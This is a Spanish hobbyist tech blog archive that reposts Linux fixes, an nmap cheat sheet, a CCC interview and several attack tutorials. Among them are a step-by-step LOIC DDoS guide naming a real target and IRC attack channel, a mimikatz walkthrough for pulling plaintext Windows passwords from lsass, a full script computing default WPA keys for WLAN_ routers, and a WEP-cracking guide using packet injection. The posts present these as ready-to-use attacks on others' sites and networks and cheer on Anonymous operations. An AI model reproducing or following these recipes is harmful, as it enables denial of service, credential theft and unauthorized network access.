Mostrando entradas con la etiqueta Bug. Mostrar todas las entradas
Mostrando entradas con la etiqueta Bug. Mostrar todas las entradas

jueves, 8 de octubre de 2015

Resolver error WARNING: Your copy of avconv is outdated

Bueno,

El otro día estaba mirando unas cosas de unos videos y me dio el siguiente error

WARNING: Your copy of avconv is outdated, update avconv to version 10-0 or newer if you encounter any errors.

Para solucionarlo, no me quedaba mas remedio que forzar ffmpeg. Nunca lo habia hecho antes, pero la maravillosa herramienta youtube-dl tiene opciones para todo ;)

Queda en algo asi

youtube-dl -x --audio-format mp3 --prefer-ffmpeg URL

-x : Extraer audio
--audio-format : Autoexplicativo
--prefer-ffmpeg : Usa ffmpeg para la conversión en vez de AVCONV que en mi caso no tenia versión superior a la ya instalada.

domingo, 1 de marzo de 2015

Sobreviviendo a muerte de X por instalacion de driver privativos

Bueno, en estos días me estaba pegando con debían y me ocurrió lo típico...expongo comandos:

Para los que usamos tarjetas de vídeo de Ati
$apt-get install fglrx-driver
$aticonfig --initial
#reboot

Y nada no arranca...va mal, no tira ni a cañonazos...solo tenemos una tty

Asi que nada, toca quitar eso y ponernos serios

#apt-get remove --purge fglrx-driver

Ahora generamos el fichero que usaba antes nuestro querido debian y que funcionaba:

#Xorg -configure

Esto creara un archivo llamado 'xorg.conf.new' con la configuración, pues bien ahora usamos este para sobrescribir el malo de los privativos

#mv xorg.conf.new /etc/X11/xorg.conf
#service lightdm restart


Y ya todo debería ir bien :D y volváis a tener las X funcionando

sábado, 13 de diciembre de 2014

Unetbooting error: Failed to load libutil.c32 o menu.c32 o libcom32.c32

Bueno, hoy tuve que preparar una live para unas cosas y me toco los pies el unetbootin, que ya me los lleva tocando tiempo, pero bueno como lo uso poco...el caso es que busque un poco el fallo y es que unetbooting no copia bien unas 'lib' necesarias para el arranque del sistema

Esto según he leído puede deberse al cambio de posición de las mismas en versiones recientes del sistema, por el tema de cargar con EFI y demás, ahora estos archivos se encuentran en:

/usr/lib/syslinux/modules/bios/

En este lugar encontraremos 3 lib que necesitamos:

menu.c32
libutil.c32
libcom32.c32

Las copiamos en el raiz del usblive creado y ya nos arrancara a la perfección ;)

martes, 21 de febrero de 2012

LOIC para androida

Desde Anonymous Argentina nos llega una versión de LOIC para Android: WebLoic by alfred.
Esta herramienta ha sido fácilmente creada a través de AppsGeyser, un servicio gratuito on-line que permite generar una aplicación de Android simplemente con una URL, código HTML o documento (PDF o DOC) y sin tener conocimientos previos de programación.

En este caso, el autor utilizó una URL de una página de pastehtml que contenía una versión Javascript de LOIC para atacar al Gobierno argentino bajo la operación #opargentina.

Cuando la aplicación se ejecuta, el componente WebView muestra el contenido de la URL, que es básicamente una página web con un JavaScript que envía 100 peticiones HTTP con el mensaje “We are LEGION!” como uno de sus parámetros.

Cómo veis, crear aplicaciones para Android que ejecuten ataques DoS es ahora muy fácil...


fuente:http://www.hackplayers.com/2012/02/webloic-para-android-por-alfred.html

viernes, 10 de febrero de 2012

Obtener Contraseña Administrador de Windows desde Windows (Sin Hash NTML/LM)

Bueno, la verdad es que hace una semana que leí sobre está noticia en www.s21sec.com, la intenté poner a prueba, pero no me funcionó xP por falta de tiempo y paciencia, pero fue hace poco que en germanvasquez.wordpress.com explican un poco más detallado el uso de la herramienta en cuestión. Así que ahora entraré a explicar el tema.
Desde ya hace tiempo que la forma de obtener la contraseña de administrador de Windows desde Windows ha sido obteniendo un Hash encriptado en NTLM o LM desde el SAM remoto o local de Windows, una vez obtenido ese Hash hay que crackear la contraseñas por fuerza bruta mediante Rainbow Tables, lo que se demora mucho y se hace imposible si tiene más de 10 dígitos la  contraseña, por lo cual muchas veces se prefieres usar la técnica Pass the Hash que consiste en la posibilidad de autenticarse entre máquinas Windows sin necesidad de password, solamente con el Hash (No se preocupen si no entendieron, este es un mega resumen que da para escribir mucho más).
Ahora... Gracias a un investigador francés apodado "Gentil Kiwi" que ha descubierto una nueva técnica que consta de:

Dentro del LSA (Local Security Authority) de Windows existen dos proveedores de autenticación por defecto (Tspkg y Wdigest) que almacenan las credenciales de los usuarios de forma reversible. Realmente no por un fallo inadvertido, si no porque estos módulos proveen autenticación a otros esquemas que necesitan conocer la contraseña, no sólo el hash.
Sin embargo, esto facitita a un atacante la posibilidad de recuperar las contraseñas en texto claro si dispone de permisos de debug sobre el proceso del LSASS (grupo de adminitradores), algo que podría haber conseguido previamente, por ejemplo, mediante la explotación previa de una vulnerabilidad de escalado privilegios (accediendo como SYSTEM).
 Pues bueno, ya mucho blah blah ahora manos a la obra:
1.- Nos descargamos la herramienta desarrollada por "Gentil Kiwi": mimikatz
2.- Abrimos el CMD con privilegios de administrador:


3.- Ejecutamos mimikatz.exe desde la consola que abrimos anteriormente.

4.- Ahora ejecutamos una serie de comandos que entro a explicar después de la imagen:


(1) Damos privilegios sobre el proceso lsass.exe
privilege::debug

(2) Inyectamos el proceso lsass.exe y la dll maliciosa sekurlsa.dll
inject::process lsass.exe sekurlsa.dll

(3) Obtenemos las contraseñas de Inicio de Sesión
@getLogonPasswords

(4) Es la contraseñas del usuario AADMIN, (5) La misma contraseña pero de otro inicio de sesión.
El método funciona en Windows XP, Vista y 7, en anteriores no sé. Yo creo que pronto será parchado, pero siempre se puede contar con que usen un SO desactualizado...

Fuentes y Referencias:

[+] Salu2
[+] Zion3R

Fuente:http://www.blackploit.com/2012/02/obtener-contrasena-administrador-de.html

miércoles, 25 de enero de 2012

Como hacer DoS con LOIC


En este sencillo tutorial voy a explicar como usar el LOIC, el programa que usa Anonymous para lanzar los conocidos ataques DDos.



Uso del LOIC

1-
Antes de nada, tenemos que desactivar el antivirus, pues el programa es detectado como un virus.

2-
Nos descargamos el programa...https://github.com/downloads/NewEraCracker/LOIC/loic.v1.1.1.25.zip

3-
Una vez descargado, lo descomprimimos y lo ejecutamos. Nos saldrá la siguiente ventana:


A partir que aquí hay 2 formas de atacar:

a)

4-
Los datos importantes para ejecutar los ataques DDos son:
IRC Server: aqui va la url del servidor
Port: aqui va el puerto, en general casi siempre es 6667.
Channel: por defecto está en #loic, pero a veces cambia.

Por ejemplo, en la Operación Policía los datos fueron:
IRC Server: irc.criten.net
Port: 6667
Channel: #oppolicia-loic

Los que planean los ataques DDos los suministran. De esta forma, es todo automatizado. Ellos controlan los ataques desde su PC y los dirigen a dónde quieran.

5-
Una vez insertados los datos, marcamos IRC Mode (HiveMind).

6-El programa solo se conectará y empezará los ataques DDos. Abajo, en Requested, puedes ver los paquetes.

b)
4-
Primero debes introducir la URL el sitio que queremos atacar (en URL, dentro de Selected Target). Por ejemplo, Taringa! (evidentemente, no lo hagáis). Por lo tanto debemos introducir www.taringa.net.

5-
Una vez introducida la URL pulsamos Lock on, y en Selected Target saldrá una IP (unos números separados por puntos). Después pulsamos IMMA CHARGIN MAH LAZER.

6-
El programa solo se conectará y empezará los ataques DDos. Abajo, en Requested, puedes ver los paquetes.



Espero que os haya servido y...
¡Un apoyo para los de Anonymous!
Fuente:http://www.taringa.net/posts/offtopic/11077639/_tutorial_-Como-usar-LOIC-_DDos_.html

domingo, 1 de enero de 2012

Clave WPA por defecto CalcWLAN-ng

1º – copias este codigo:
#!/bin/bash
echo CalcWLAN by a.s.r
if [ $# -ne 2 ]
then
echo “Usage: $0 “
echo
echo “Example: $0 WLAN_C58D 64:68:0C:C5:C5:90″
exit 1
fi
HEAD=$(echo -n “$1″ | tr ‘a-z’ ‘A-Z’ | cut -d_ -f2)
BSSID=$(echo -n “$2″ | tr ‘a-z’ ‘A-Z’ | tr -d : )
BSSIDP=$(echo -n “$BSSID” | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)
echo “La puta clave es $KEY”+
2º – lo pegas dentro de un archivo en blanco y lo guardas en el escritorio con el nombre calWLAN-ng.sh
3º – ejecutas este comando:
chmod 777 /home/”tu usuario”/Escritorio/calWLAN-ng.sh
4º – lo arrastras a la terminal y seguidamente pones el ESSID de la red y despues el BSSID
5º – pulsas intro
nota//
si no entendiste alguna palabra es mejor que 1º le eches un ojo a este tutorial: http://securewireless.wordpress.com/2011/10/25/clave-wifi-cifrado-wep/ ,una vez sepas como se hace con las wep, esto no te resultara muy complicado xD
saludos!

Fuente:http://securewireless.wordpress.com/2011/11/30/clave-wpa-por-defecto-calcwlan-ng/

Crack WEP inyectando paquetes

Para más información: imation-group.blogspot.com

————————————————————————————————————————————————————

MATERIALES

- Un CD en blanco
- Un sistema operativo de Linux (back track 5 R1) os lo podéis descargar desde la página oficial:
http://www.backtrack-linux.org/downloads/
- Un programa gratuito llamado imgburn (enlace de página oficial)
http://www.imgburn.com/index.php?act=download
- Una tarjeta wifi compatible con backtrack4
http://aircrack-ng.org/doku.php?id=compatibility_drivers#usb
\\nota
- El enlace muestra información hacia bactrack4, no backtrack5 R1, que es mucho mas tolerante con los drivers, por experiencia personal, me funcionaron todas las tarjetas wifi que tuve.
- Podéis arrancar desde cualquier sistema aunque sea desde un pen-drive pero puse esta opción porque me parece la mas sencilla, solo con tener la suite Aircrack-ng, ya os vale:
apt-get install aircrack-ng
—————————————————————————————
(haré entrada sobre BIOS)
——

GRAVANDO EL CD DE ARRANQUE

Al iniciar el img-burn
Saldrá un menú donde se pueden hacer varias cosas pero lo que nos interesa es la primera opción (write image file to disc) “grabar archivo de imagen a disco”
Clicamos, y arriba dice (please select a file…) “por favor selecciona un archivo” encontraras un icono en forma de carpeta y un símbolo (+) en verde, seleccionar el archivo ISO, se introduce el CD y pinchar en este icono:

El programa empezara a grabar el CD de arranque, cuando termine se reinicia el PC con el CD de arranque dentro del lector de CD.
si el PC arranca desde el CD perfecto, en el caso de que arranque normalmente debemos configurar la BIOS

CONFIGURACIÓN DE LA BIOS

Existen muchos tipos de BIOS así que lo único que os puedo aportar no va a ser mucho deberíais ir a la página oficial del fabricante de vuestro PC y bajaros el manual de la placa base para saber configurarla
pero si queréis probar suerte….
Cuando inicia el ordenador lo primero que aparece, es una pantalla en negro, es ahí donde la BIOS chequea los componentes del PC para comprobar que puede arrancar perfectamente y os tiene que poner algo así como que presiones F2, F12, F8, F9…
Deberíais encontrar alguna pestaña donde ponga “Boot o Settings Boot o algo parecido”
si os aparece una lista donde ponga el orden de arranque: disco duro, CD-ROM, USB… pues se tendría que deja el CD-ROM en la parte de arriba, dándole a la tecla espaciadora normalmente o simplemente seleccionando la opción CD-ROM Drive.

PRIMEROS PASOS EN AIRCRACK-NG

Nos aparecerá un menú para escoger la resolución entre otras cosas, escogemos la primera, y si tenéis fallos pues la que pone “Tex mode” una vez con el sistema operativo funcionando en vuestro PC os aparecerá una ventana donde se carga el S.O hasta que pare de cargar.
-Teclear el comando startx para iniciar el modo gráfico el S.O. y aparecerá un escritorio


Una vez salga el escritorio:
Abrir una Shell.

CONFIGURANDO INTERFAZ CON AIRMON-NG

——————————————————————-
el primer comando “airmon-ng”
es un comando utilizado para ver las interfaces de red.
Si tu tarjeta es compatible en principio aparecerá en esta lista con su driver especificado y su chipset.

Bien,
Una interfaz es un nombre que se utiliza para denominar a una tarjeta de red con una configuración específica, por ejemplo la podemos configurar en modo monitor
el comando es el siguiente:
-          airmon-zc start (interfaz)
En mi caso es wlan0

-          Explicación:
el modo promiscuo o monitor nos permite recoger todo el trafico que esta pasando por el medio de transmisión, si está en modo monitor solo capturara el trafico dedicado a esa tarjeta de red,
esto se sabe porque un paquete de datos se compone de varias tramas, una de ellas es la cabecera donde especifica entre otros, la dirección MAC y puerto de destino y origen.
Si un paquete tiene la MAC de destino xx:xx:xx:xx:xx:11 y nuestra MAC es la  xx:xx:xx:xx:xx:22 la tarjeta lo interceptara, leerá la cabecera y lo desechara, pero lo que nos interesa es interceptar el paquete, guardarlo y luego analizarlo.
Lo más importante de este paso es que tiene que salir (MONITOR MODE ENABLED ON “interfaz nueva”)
Después para comprobar que nos creó la otra interfaz en modo monitor ejecutamos airmon-ng


OK,  efectivamente ha creado una nueva interfaz, cogiendo la configuración de la tarjeta wifi con interfaz wlan0, pero como se acaba de poner en modo monitor, ha creado otro nombre para poder diferenciar entre interfaces (fijémonos que el chipset y el driver son los mismos..)

ESNIFANDO PAQUETES CON AIRODUMP-NG

—————————————————————-
Ahora ejecutamos el programa “airodump-ng”, que es un escáner de redes inalámbricas
el comando se ejecuta seguido de la interfaz en modo monitor.
Con este programa se obtendrán datos muy interesantes,
por lo tanto ejecutamos “airodump-ng mon0″

La red que se usara en esta práctica será la WLAN_X,
Los motivos por los cuales es la más indicada y fácil son los siguientes:
-          El cifrado es WEP, el más fácil y antiguo para auditar redes inalámbricas
-          Hay un cliente asociado correctamente el BSSID
-          Se pude ver claramente que está generando paquetes, ya hay 4 paquetes asociados a WLAN_X y el cliente que los está generando ha emitido 1 paquete
Definiciones de esto:
Cliente asociado: es un PC que esta por lo menos reconocido por esa red,
En una red WIFI, en local hay 3 estados en los que un PC puede estar: no asociado, asociado y asociado y autenticado, os dejo un diagrama para entender el proceso, desde que un cliente quiere conectarse a una red, hasta que está conectado:

Esto quiere decir que,
- Un cliente se pude autenticar pero no puede estar asociado (1º paso para asociarse)
- Un cliente se puede asociar despues de estar autenticado ( forma correcta de logearse)
- Un cliente se pude disociar una vez asociado, pero seguir autenticado (denegación de servicio)
- Un cliente se puede desautenticar despues de estar autenticado y asociado (denegación de servicio)
- Un cliente se puede disociar y despues des-autenticar una vez asociado y autenticado (denegación de servicio)
autenticarse:
cuando algo se autentica en un sistema, quiere decir que le da los datos al sistema y el sistema los comprueva si no hay ningun fallo en esa autenticación, pongamos el ejemplo de un restaurante con las mesas reservadas, primero los clientes se autentican para hacer la reserva y despues cuando estan comiendo se asocian.
asociarse:
una aosociación en nuestro caso, se produce cuando el router o punto de acceso comprueva si esa MAC esta permitida y si ha puesto la contraseña correcta entre otras cosas
conclusion: si un cliente no se asocia no se puede conectar a internet, pero si puede autenticarse
———————————————————————————–
Es importante conocer varios conceptos:
BSSID: es la mac del punto de acceso o router
PWD: es la potencia de la señal
BEACONS: son una parte de los paquetes
DATA: son paquetes donde están los IVS
#/s: son los DATA por segundo capturados
CH: channel o canal wifi por el que se emite
MB: velocidad soportada
ENC: es el tipo de encriptación
AUTH: especifica el cifrado de la encriptación
ESSID: es el nombre de la red
3.1
Para empezar a capturar paquetes con el programa airodump-ng, utilizaremos este comando
airodump-ng -c(canal) –bssid (la mac del router) -w (el nombre del fichero donde se guardaran los paqutes entre otras cosas)  (interfaz)

Airodump nos empezara a capturar paquetes:

en la imagen de anterior podemos apreciar que existe un cliente asociado (RECUADRO AZUL) a una MAC o AP (RECUADRO ROJO) y esta generando paquetes.
explicación:
un cliente asociado es un cliente conectado a la red y que ademas esta autenticado, se pueden apreciar donde pone STATION y BSSID en la parte de abajo, esto es muy importante ya que se podrá inyectar paquetes a ese cliente y así no tener que autenticarnos nosotros por medio de otros ataques,que ya veremos en otro momento pero al que le pique la curiosidad puede visitar este enlace que es muy interesante:
http://bitzero-lm.blogspot.com/2009/01/tutorial-aireplay-ng.html
Donde pone “pakets”, son los paquetes que esta generando ese cliente.
En “station” es la mac del cliente
BSSID es la mac del router a la que esta asociado o autenticado ese cliente.
si sale algo así como “length” puede ser que este ocultando su asociación y airodump tardara mas en destapar al cliente, o puede ser que sea una red que genera por ejemplo un teléfono móvil con wifi activado o otra antena que no este conectada a ningún router.
Los “proves” no son gente sin dinero… son los bssid guardados a los que esa tarjeta se conectó.
Lost son los paquetes perdidos que genera el cliente, esto se da cuando no se tiene la cobertura suficiente.

INYECTANDO PAQUETES CON AIREPLAY-NG

——————————————————————
la siguiente acción (en caso de que exista algún cliente asociado) sera inyectar paquetes al cliente para acelerar el proceso considerablemente, abrimos otra consola e introducimos este comando.
aireplay-ng -3 -b (mac del router) -h (mac del cliente) (interfaz)

explicación del comando:
aireplay-ng = arranca el programa aireplay-ng
-3 = ejecútalo con el ataque 3
-b = al siguiente BSSID
-h = que tiene el siguiente cliente
interfaz = especifica por que interfaz quieres que lo ejecute.
aquí veremos como inyecta paquetes (es muy importante que tenga ARP y ACK,solo con ACK no se puede inyectar) ya veremos mas adelante otros ataques para conseguir ARPs.
Esto es lo que pasa cuando consigue ARP + ACK:

esta es la imagen iremos a  la consola nº1 (para verificar que realmente estamos inyectando).
vemos como el numero de paquetes recogidos crece exporencialmente.
tanto el los que recogemos como los que genera el cliente conectado gracias a nosotros.
Cambios importantes:
Ha crecido en numero de paquetes que el router ha recogido
Ha crecido el numero de paquetes que re coge por segundo #/s
Ha cracido en numero de packets que envía el cliente al AP o STATION
Ha crecido en numero de paqutes perdidos (LOST) que el cliente envía pero no recibe correctamente el AP o STATION, esto se debe a la escasa cobertura, calidad y potencia de la señal.

CRACKEANDO CONTRASEÑAS CON AIRCRACK-NG

———————————————————————–
si todo va bien ejecutamos el programa aircrack-ng en otra consola: aircrack-ng (nombre del fichero+-01.cap)

ejemplo:
si yo le pongo al fichero de los paquetes el nombre (imationgroup) pues entonces tengo que ejecutar aircrack-ng imationgroup-01.cap
si tenéis dudas podéis mirar en /root o probar con la opción de auto completar con la tecla TAB
enpezara con el proceso de desncriptado:

explicación:
cuando ejecutas airodump para capturar paquetes,le tienes que indicar el nombre de la carpeta, pero airodump no solo guarda un fichero de captura (.cap) si no que guarda otros datos en otros ficheros para separarlos, por eso nos crea varios, pero a nosotros nos interesa en concreto el (.cap) que es el fichero donde se recogen los paquetes para desencriptar la contraseña
una vez echo esto queda un poco de paciencia (no mucha si estáis inyectando paquetes) y os aparecerá en aircrack algo así como (KEY FOUND) “clave encontrada”
si no se han recogido los paquetes suficientes pondrá algo como “Failed, nex try whit x paquetes”
eso quiere decir que el proceso de desencriptacion ha fallado, y que como Aircrack esta programado para ser una herramienta automática, pues esperará a que Airodump recoja mas paquetes para probar otra vez.

y al fin aquí esta nuestra contraseña.
primero estará en hexadecimal y luego es ASCII (valen las 2 pero la que esta en hexadecimal se pondrá sin los 2 puntos que separan cada 2 digitos) y si quieren un combersor aquí os lo dejo:
http://www.seguridadwireless.net/php/conversor-universal-wireless.php
—————————————————————————–
TUTORIAL ECHO POR WIRESHOK  ”IMATIONGRUOP”

Fuente:http://securewireless.wordpress.com/2011/10/25/clave-wifi-cifrado-wep/

martes, 15 de noviembre de 2011

GoLISMERO: Simplificando tus Auditorías Webs


Hace poco me entero de una gran iniciativa en www.iniqua.com el cual me ha gustado, GoLISMERO creado por Dani, que consta principalmente de un spiders de urls que ayuda bastante para encontrar posibles SQLi y más. Los dejo con la info:


¿Qué es GoLISMERO?

GoLISMERO es un spider web capaz de detectar vulnerabilidades y formatear los resultados de forma muy útil cuando se afronta una auditoría web.

¿Para qué sirve?

GoLISMERO está pensado para ser un primer paso cuando comenzamos una auditoría de seguridad web.
Cada vez que nos enfrentamos a una nueva URL, ¿no sería genial poder disponer de forma sencilla y rápida de todos los enlaces, formularios con sus parámetros, detectar posibles URL vulnerables y que además de que se presentasen de manera que nos permita hacernos una idea de la todos los puntos de entrada donde podríamos lanzar ataques? GoLISMERO nos permite hacer todo esto.


Aprendiendo con ejemplos

A continuación se exponen diversos ejemplos y casos prácticos, que son la mejor forma de aprender a usar una herramienta de seguridad:
1.- Extraer todos los enlaces y formularios de una web, con todos sus parámetros, en formato extendido:
GoLISMERO.py -t google.com


2.- Extraer todos los enlaces, en modo compacto y colorear la salida.
GoLISMERO.py -c -m -t google.com



3.- Extraer solo los enlaces. Quitando css, javascript, imágenes y direcciones de correo.
GoLISMERO.py --no-css--no-script --no-images --no-mail -c -A links -m -t google.com

O, formato reducido:
GoLISMERO.py -na -c -A links -m -t google.com



4.- Extraer solamente los enlaces que tienen parámetros, seguir las redirecciones (HTTP 302) y exportar en HTML los resultados.
GoLISMERO.py -c -A links --follow -F html -o results.html -m -t google.com


Y el HTML de resultados generado:



5.- Extraer todos los enlaces, buscar URL potencialmente vulnerables y utilizar un proxy intermedio para el análisis. Las URLs o parámetros vulnerables serán resaltados en rojo.
GoLISMERO.py -c -A links --follow -na -x -m -t terra.com


Comprobamos como ZAP Proxy captura la petición:



El proyecto personalmente me gusto mucho, es muy útil para buscar posibles SQLi rápidamente sin tener que hacerlo a mano o recurrir a algún scan lento.

El script es muy rápido y como lo abran notado está hecho en python. Sin duda muy buena iniciativa.

Web del proyecto:
https://code.google.com/p/golismero/

Web del autor: http://www.iniqua.com/
 
Fuente:http://www.blackploit.com/2011/11/golismero-simplificando-tus-auditorias.html

miércoles, 9 de noviembre de 2011

La influencia política de los hackers en Alemania



Alemania tiene una larga historia de hacking político gracias al legendario Chaos Computer Club (CCC), un grupo de hackers que desde hace 30 años se ha dedicado a explorar las implicaciones de la tecnología para las libertades civiles y la privacidad.
Sabine Blanc y Ophelia Noor han publicado en la revista Owni, una fascinante entrevista con Andy Müller, vocero y miembro del consejo del CCC, enfocada en la influencia política de los hackers en Alemania y su rol en el desarrollo de una conciencia social en torno a temas como la protección de datos, las tecnologías abiertas y la transparencia gubernamental.
CCC se ha anotado hacks de gran impacto político como la captura de la huella digital del Ministro del Interior Alemán en 2008 para demostrar la vulnerabilidad de los pasaportes biométricos. Recientemente, revelaron un vergonzoso trojano federal que tenía como objetivo espíar a los ciudadanos, lo cual lograron realizando una ingeniería en reversa del infame R2D2. Además, son los responsables del evento tecno-político más importante en nuestros días: el Chaos Communication Congress.
De acuerdo a Müller, el CCC ha estudiado el servicio secreto de inteligencia mejor documentado en Alemania — la STASI — y el conocer sus técnicas de entrenamiento y de desestabilización de comunidades les ha sido de gran ayuda para comprender el mundo actual y sus líos.
A reserva de que recomiendo muchísimo leer la extensa entrevista con Müller, a continuación rescato extractos de su opinión acerca de la influencia de los hackers en Alemania y la relación con su contexto histórico.
Temas como la privacidad son bien sensibles, especialmente dada la historia del este de Alemania. Sabemos cómo es que el abuso estructural puede convertirse en algo peligroso, porque aquí hemos hecho todo. Como poner estrellas amarillas en la gente antes de mandar a ejecutarlos.
Tenemos conciencia, pero eso también viene del sistema de educación alemán. En la escuela aprendes la historia del nazismo. Los alemanes somos anti-autoritarios y anti-didácticos.
Como alemanes, tenemos estos dos aspectos conflictivos en nuestro código genético. Aspiramos a una gran eficiencia y una excelente organización en todo lo que hacemos. Pero también tenemos un gran entendimiento del mal que las estructuras jerárquicas pueden traer a la comunicación, o el tratar a las personas como objetos.
OWNI pregunta a Müller sí es cierta la percepción de que los hackers son cada más influyentes en el ámbito político alemán:
Creo que es cierto. Si observas el entorno político en Alemania, el CCC es una entidad aceptada y reconocida porque ha trabajo en educar al público acerca de la tecnología desde los 80´s. Siempre hemos lidiado con historias extrañas que nos traen y tenemos la capacidad de explicar por ejemplo, la desaparición de datos.
Los medios alemanes siempre nos han visto como gente que sabe de tecnología, sus beneficios y sus peligros, y no nos ven como gente que trabaja para compañías con intereses comerciales.
En los 90´s fuimos invitados a audiencias del gobierno acerca de regulación de telecomunicaciones y privacidad. Tratamos de organizar la participación del público en estos temas. Tenemos una historia de lobbying de más o menos 20 años.
No queremos intregrarnos necesariamente de una manera formal en la creación de políticas, pero tenemos un rol de asesoría externa. Ellos (el gobierno) ya no pueden darse el lujo de ignorarnos. Los políticos necesitan de nuestra experiencia y además estamos muy familiarizados con las leyes, de modo que podemos señalar errores. La ventaja que tenemos es que en CCC podemos ir tras las cuestiones políticas, mientras otros además pueden hablar más sobre las cuestiones técnicas. Tenemos ambos lados.
Acerca de la importancia de la transparencia gubernamental, Müller habla de su primera experiencia en una conferencia de seguridad en los Estados Unidos y comparte la explicación que los propios funcionarios alemanes le dieron acerca de la cultura del secretismo gubernamental. Personalmente, jamás había leído una explicación tan clara y simple acerca de la relación entre el control y opacidad:
Fui invitado a una conferencia en Washington llamada Open Source Intelligence, y conocí a gente de la Embajada Alemana que trabajaron para en las oficinas del servicio secreto alemán. Pregunté de qué se trataba toda esta cultura del secretismo y me dijeron directamente: “Estamos tratando de desacelerar los procesos para poder controlarlos mejor”.
Los hackers del Chaos Computer Club precisamente van en contra de lo anterior, por lo cual crean el contexto político y las herramientas para lograrlo:
Queremos dar a todos el poder de saber qué es lo que sucede para ayudarlos a tomar decisiones informadas.
La construcción de un entorno político verdaderamente plural depende de la diversidad en las prácticas sociales. El hacking como estructura de producción de conocimiento y por tanto de información, es sin duda una práctica que veremos cada vez más integrada al ámbito político y sus efectos tendrán cada vez más impacto.
En Alemania, Chaos Computer Club lleva la batuta en cuanto al hacking político, podemos aprender.
Imagen CC vía OWNI.

martes, 8 de noviembre de 2011

Miniguia de nmap

En muchos casos nos encontramos con problemas en la red que requieren de pruebas rigurosas para poder ser detectados. La herramienta nmap, es gratuita y nos sirve para saber que ServiciospuertosNetBIOS, Sistemas Operativos, etc están en el PC o bien en un equipo remoto.

Estas características suelen sernos de mucha ayuda al ver si un PC dentro de la red con un servicio particular realmente es accesible al puerto configurado desde otro ordenador.

La forma en la cual muestra el estado de los puertos es:

  • OPEN: Esto indica que la aplicación de la máquina remota se encuentra esperando conexiones en el puerto indicado.
  • CLOSED: Esto indica que no hay ninguna aplicación escuchando en dicho puerto.
  • FILTERED: Indica que un cortafuegos, filtro u otro obstáculo en la red está bloqueando el acceso a ese puerto.
Para lanzar la aplicación, deberemos escribir en la consola nmap (opción) (IP).

Lista de Opciones

Escaneo:
nmap -sP 192.168.1.10  # solo ping
nmap -sS 192.168.1.10  # tcp syn
nmap -sT 192.168.1.10 # tcp connect (three-way-handshake)
nmap -sU 192.168.1.10  # udp
nmap -sN 192.168.1.10  # tcp null
nmap -sF 192.168.1.10  # tcp fin
nmap -sA 192.168.1.10  # tcp ack
nmap -sX 192.168.1.10   # tcp christmas tree (fin + push + urg)
nmap –scanflags URGACKPSHRSTSYNFIN 192.168.1.10  # tcp a medida
nmap -F 192.168.1.10 # escaneo rápido (los 100 puertos más conocidos)
nmap –top-ports 192.168.1.10  # los 10 puertos más conocidos
nmap -p http,https 192.168.1.10  # nombre de puertos
nmap -p 1-80 192.168.1.10  # rango de puertos
nmap -p U:1-50,T:51-100 192.168.1.10  # rango de puertos por protocolo
nmap -p “*” -r 192.168.1.10  # todos los puertos secuencialmente

Detección:
nmap -O 192.168.1.10 # sistema operativo
nmap -sV 192.168.1.10 # versión de los servicios

Evasión:
nmap -f 192.168.1.10 # fragmentar en paquetes ip de 8 bytes
nmap –mtu 16 192.168.1.10 # fragmentar en paquetes ip de 16 bytes
nmap -D RND:5 192.168.1.10 # genera 5 @ip aleatorias (señuelos)
nmap -sI 192.168.1.20 192.168.1.10 # escaneo utilizando un zombie
nmap –source-port 80 192.168.1.10 # puerto de origen 80
nmap –data-length 40 bytes 192.168.1.10 # añade 40 bytes
nmap –spoof-mac 0 192.168.1.10 # utiliza una @mac de origen aleatoria

Logs:
nmap -oN ft.txt 192.168.1.10 # fichero de texto
nmap -oX fx.xml 192.168.1.10 # fichero xml

Descubrimiento:
nmap -PN 192.168.1.10 # no hagas ping
nmap -PS 192.168.1.10 # ping tcp syn
nmap -PA 192.168.1.10 # ping tcp ack
nmap -PU 192.168.1.10 # ping udp
nmap -PY 192.168.1.10 # ping sctp init
nmap -PE 192.168.1.10 # ping icmp echo
nmap -PP 192.168.1.10 # ping icmp timestamp
nmap -PM 192.168.1.10 # ping icmp address mask
nmap -PO 192.168.1.10 # ping protocolo ip
nmap -PP 192.168.1.10 # ping arp
nmap —traceroute 192.168.1.10 # traceroute

Os invito a probar esta interesante herramienta.

Fuente:http://www.nosolounix.com/2011/11/uso-de-nmap.html

Cómo llamar desde casa simulando que estás en la oficina




Cuántas veces hemos pensado eso de "Y pensar que el jefe hoy está de viaje y no va a ir a la oficina. Lo que daría por poder quedarme en casa y hacer mi trabajo desde allí". Con los recursos de conexión de los que disponemos en nuestros días, el teletrabajo es una opción excelente, pudiendo estar conectados por VPN a la oficina, sin importar si llueve o nieva ahí fuera.

Sin embargo, si queremos evitar sospechas por parte del jefe, y dejar constancia de que estamos en la oficina, una solución es hacerle una llamada, con cualquier excusa, desde el número de la oficina y así se quedará tranquilo.

Para esto, tenemos como opción utilizar alguno de los servicios que permiten falsificar el número llamante o CallerID. Sin embargo, imaginemos que al jefe, justo al colgarle, se acuerda que olvidó decirnos algo y nos llama al número de la oficina. Habiendo falsificado el origen de la llamada, desde el sofá de casa, o enrroscados en la cama, nunca oirías esa llamada y el jefe te pillaría.

Para evitar esto (y para otras miles de funcionalidades), podemos hacer lo que hoy os planteo. Montar un dispositivo ATA que reenvíe la señal analógica, que llega por el cable RJ-11 del teléfono, de la oficina a una centralita con Asterisk mediante VoIP.

La idea es utilizar Asterisk como centralita y un soft-phone instalado en nuestro PC, que nos permita conectarnos a dicho Asterisk "como si estuviésemos en la oficina".

En el dibujo de abajo podéis ver la idea:


Ciertamente, tenía la espinita clavada, desde hacía tiempo, de no haberme sentado nunca a trastear con centralitas de VoIP. Hablando, entre cervezas, con Domingo, uno de mis mejores amigos, que montó hace unos años la empresa Monema, que ofrece servicios de telefonía en la nube para PYMES, me animó a ello y me orientó a cómo hacerlo desde casa con un equipamiento bastante económico.

Todos los manuales, foros y documentación en general que me he encontrado por Internet, sobre este tipo de proyecto basados en Asterisk, es bastante "difusa" (por decirlo finamente). Y como lo que he visto no me ha resultado muy claro, he decidido, una vez que ya se de qué va el tema, contarlo con el mejor de los detalles desde aquí.

